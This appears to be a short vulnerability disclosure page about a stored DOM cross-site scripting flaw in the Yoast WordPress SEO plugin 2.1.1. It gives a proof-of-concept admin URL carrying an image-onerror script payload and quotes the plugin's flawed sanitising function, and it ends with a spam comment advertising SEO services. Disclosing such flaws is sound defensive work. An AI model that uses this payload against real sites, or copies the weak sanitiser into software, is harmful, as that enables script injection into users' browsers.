WordPress SEO by Yoast 2.1.1 - Authenticated Stored DOM XSS
WordPress SEO by Yoast 2.1.1 XSS, WordPress SEO by Yoast 2.1.1 vulnerability, Stored DOM XSS on wordpress Yoast plugins
Description:- The “snippet preview” functionality of the Yoast WordPress SEO plugin was susceptible to cross-site scripting in versions before 2.2.
Proof of Concept Vulnerable URL:
References:- https://inventropy.us/blog/yoast-seo-plugin-cross-site-scripting-vulnerability/
Proof of Concept Vulnerable URL:
/wp-admin/post-new.php?post_title=<img src=x onerror=alert(1)> Vulnerable Code (wordpress-seo/js/wp-seo-metabox.js): function yst_clean(str) { if (str == '' || str == undefined) return ''; try { str = jQuery('<div/>').html(str).text(); str = str.replace(/<\/?[^>]+>/gi, ''); str = str.replace(/\[(.+?)\](.+?\[\/\\1\])?/g, ''); } catch (e) { } return str; }
Link: https://github.com/Yoast/wordpress-seo/blob/2.1.1/js/wp-seo-metabox.js#L1-13
1 comment
we provide affordable and result-oriented SEO services, please give a chance to serve you.
Thanks
Admin: E07.net